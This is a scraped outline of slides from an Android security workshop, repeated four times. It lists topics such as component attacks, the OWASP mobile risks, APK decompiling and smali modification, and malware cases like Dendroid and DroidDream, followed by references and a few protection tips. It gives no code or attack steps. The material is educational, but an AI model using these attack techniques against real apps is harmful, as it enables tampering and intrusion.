Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-